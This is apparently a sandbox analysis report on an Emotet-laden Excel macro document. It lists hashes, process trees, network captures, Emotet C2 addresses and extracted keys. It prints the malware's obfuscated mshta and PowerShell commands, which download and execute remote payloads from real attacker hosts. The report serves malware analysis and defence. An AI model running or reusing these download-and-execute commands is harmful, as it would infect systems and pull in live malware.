Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 13:00

General

  • Target

    92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm

  • Size

    115KB

  • MD5

    12f7a6aa0a09e355bd70c8291ae682e2

  • SHA1

    ea7943806f839e871bb5c957d64850ca66118577

  • SHA256

    92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a

  • SHA512

    df6ee800f9bf4b2e9a60b8a371031410416992b4b1806900fdfc4d399e5c5cdf5efc53d62ce3f8549bdbe3e88e20f4c4cf6662d8b826d4c0cb082a53d0afb2a4

Malware Config

Extracted

Language
hta
Source
1
mshta http://0x5cff39c3/sec/se1.html
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$c1 = "(New-Object Net.We"
3
$c4 = "bClient).Downlo"
4
$c3 = "adString('http://92.255.57.195/sec/se1.png')"
5
$ji = "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"
6
invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://92.255.57.195/sec/se1.png")
10
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
3
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
3
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1492
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1544
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1740
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1168
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",jkYS
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1696
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1952

    Network

    • flag-ru
      GET
      http://92.255.57.195/sec/se1.html
      mshta.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.html HTTP/1.1
      Accept: */*
      Accept-Language: en-US
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:33 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
      ETag: "2adf-5d5f38fbf4740"
      Accept-Ranges: bytes
      Content-Length: 10975
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
    • flag-ru
      GET
      http://92.255.57.195/sec/se1.png
      powershell.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.png HTTP/1.1
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:40 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
      ETag: "430-5d5f3895e9680"
      Accept-Ranges: bytes
      Content-Length: 1072
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • flag-us
      DNS
      seven-lines.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      seven-lines.com
      IN A
      Response
      seven-lines.com
      IN A
      178.208.83.22
    • flag-us
      DNS
      seven-lines.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      seven-lines.com
      IN A
      Response
      seven-lines.com
      IN A
      178.208.83.22
    • flag-nl
      GET
      http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      powershell.exe
      Remote address:
      178.208.83.22:80
      Request
      GET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
      Host: seven-lines.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Thu, 20 Jan 2022 13:00:41 GMT
      Content-Type: text/html
      Content-Length: 1390
      Connection: keep-alive
      Keep-Alive: timeout=5
      Vary: Accept-Encoding
      ETag: "5a4b7cd2-56e"
    • flag-us
      DNS
      quranthemepark.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      quranthemepark.com
      IN A
      Response
      quranthemepark.com
      IN A
      104.21.59.15
      quranthemepark.com
      IN A
      172.67.167.147
    • flag-us
      GET
      http://quranthemepark.com/wp-content/OaIz2gBtm/
      powershell.exe
      Remote address:
      104.21.59.15:80
      Request
      GET /wp-content/OaIz2gBtm/ HTTP/1.1
      Host: quranthemepark.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:42 GMT
      Content-Type: application/x-msdownload
      Content-Length: 573440
      Connection: keep-alive
      x-powered-by: PHP/7.4.26
      set-cookie: 61e95cfa6871d=1642683642; expires=Thu, 20-Jan-2022 13:01:42 GMT; Max-Age=60; path=/
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      last-modified: Thu, 20 Jan 2022 13:00:42 GMT
      expires: Thu, 20 Jan 2022 13:00:42 GMT
      content-disposition: attachment; filename="Mnn5aTw4cbQfa.dll"
      content-transfer-encoding: binary
      x-turbo-charged-by: LiteSpeed
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f9paFLKTegeP5IDk2NxxNSU15mFgeI%2BSkYNERxLmZWMhC3sklK8E8%2FrgJ5hTqbw0MCTSvhDVR11FTDqfwtHaK3FUQyrwQok6i0ErQn1BpvRmqZyUoBrCCpnAsBCX6EweaEiHOCU%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6d087cbcfe261ed6-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • flag-us
      GET
      https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
      rundll32.exe
      Remote address:
      69.16.218.101:8080
      Request
      GET /LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN HTTP/1.1
      Cookie: YiLPOtLipOUi=69ndAlY7nJX7O7X28fOPnpLakAWbOBrRvH9Fxu1XphOKCEJhfpCFBMAjStZIqQEYEV1DNK+VsVSFwB9+PPMrGgd0jpNpAVDnW9+ntx0R9iZARURcfcsgdNPVA9eH1vILlrOUSKzlQt9ziLvdxNN7E+4Q/wyb5/F7f4K9GPRCD5koPhSIzxpYL7srrUqaMNgNiTWesm8XdLaMZ1J/LzDz+gK9BQzPow7y0ZaOADzQEfecUvz+DTLUdxgLUtaz3kXtMWK8Tk1UqCg/w4GVgnL7j1oD1JGZNP/7jKNOP2NmKNxxNzI=
      Host: 69.16.218.101:8080
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 20 Jan 2022 13:00:59 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • 92.255.57.195:80
      http://92.255.57.195/sec/se1.html
      http
      mshta.exe
      716 B
      11.7kB
      8
      10

      HTTP Request

      GET http://92.255.57.195/sec/se1.html

      HTTP Response

      200
    • 92.255.57.195:80
      http://92.255.57.195/sec/se1.png
      http
      powershell.exe
      678 B
      3.0kB
      13
      5

      HTTP Request

      GET http://92.255.57.195/sec/se1.png

      HTTP Response

      200
    • 178.208.83.22:80
      http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      http
      powershell.exe
      643 B
      1.8kB
      12
      5

      HTTP Request

      GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/

      HTTP Response

      404
    • 104.21.59.15:80
      http://quranthemepark.com/wp-content/OaIz2gBtm/
      http
      powershell.exe
      9.8kB
      591.0kB
      211
      414

      HTTP Request

      GET http://quranthemepark.com/wp-content/OaIz2gBtm/

      HTTP Response

      200
    • 45.138.98.34:80
      rundll32.exe
      152 B
      120 B
      3
      3
    • 45.138.98.34:80
      rundll32.exe
      152 B
      120 B
      3
      3
    • 69.16.218.101:8080
      https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
      tls, http
      rundll32.exe
      1.2kB
      3.0kB
      8
      9

      HTTP Request

      GET https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN

      HTTP Response

      200
    • 8.8.8.8:53
      seven-lines.com
      dns
      powershell.exe
      122 B
      154 B
      2
      2

      DNS Request

      seven-lines.com

      DNS Request

      seven-lines.com

      DNS Response

      178.208.83.22

      DNS Response

      178.208.83.22

    • 8.8.8.8:53
      quranthemepark.com
      dns
      powershell.exe
      64 B
      96 B
      1
      1

      DNS Request

      quranthemepark.com

      DNS Response

      104.21.59.15
      172.67.167.147

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1108-57-0x0000000075431000-0x0000000075433000-memory.dmp

      Filesize

      8KB

    • memory/1108-54-0x000000002FB81000-0x000000002FB84000-memory.dmp

      Filesize

      12KB

    • memory/1108-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1108-55-0x0000000071461000-0x0000000071463000-memory.dmp

      Filesize

      8KB

    • memory/1168-75-0x0000000000350000-0x0000000000378000-memory.dmp

      Filesize

      160KB

    • memory/1168-77-0x0000000000D80000-0x0000000000DA8000-memory.dmp

      Filesize

      160KB

    • memory/1168-79-0x0000000002350000-0x0000000002378000-memory.dmp

      Filesize

      160KB

    • memory/1168-81-0x0000000002460000-0x0000000002488000-memory.dmp

      Filesize

      160KB

    • memory/1168-83-0x0000000002670000-0x0000000002698000-memory.dmp

      Filesize

      160KB

    • memory/1168-85-0x00000000027C0000-0x00000000027E8000-memory.dmp

      Filesize

      160KB

    • memory/1168-88-0x0000000002860000-0x0000000002888000-memory.dmp

      Filesize

      160KB

    • memory/1492-58-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

      Filesize

      8KB

    • memory/1696-89-0x0000000000290000-0x00000000002B8000-memory.dmp

      Filesize

      160KB

    • memory/1740-68-0x00000000001A0000-0x00000000001C8000-memory.dmp

      Filesize

      160KB

    • memory/1744-61-0x0000000002560000-0x00000000031AA000-memory.dmp

      Filesize

      12.3MB

    • memory/1952-93-0x00000000001F0000-0x0000000000218000-memory.dmp

      Filesize

      160KB

    • memory/1952-95-0x00000000002A0000-0x00000000002C8000-memory.dmp

      Filesize

      160KB

    • memory/1952-97-0x00000000009A0000-0x00000000009C8000-memory.dmp

      Filesize

      160KB

    • memory/1952-99-0x0000000000BB0000-0x0000000000BD8000-memory.dmp

      Filesize

      160KB

    • memory/1952-101-0x0000000002540000-0x0000000002568000-memory.dmp

      Filesize

      160KB

    • memory/1952-103-0x0000000002690000-0x00000000026B8000-memory.dmp

      Filesize

      160KB

    • memory/1952-105-0x00000000027D0000-0x00000000027F8000-memory.dmp

      Filesize

      160KB

    • memory/1952-107-0x0000000002870000-0x0000000002898000-memory.dmp

      Filesize

      160KB

    • memory/1952-109-0x00000000028D0000-0x00000000028F8000-memory.dmp

      Filesize

      160KB

    • memory/1952-111-0x0000000002BB0000-0x0000000002BD8000-memory.dmp

      Filesize

      160KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.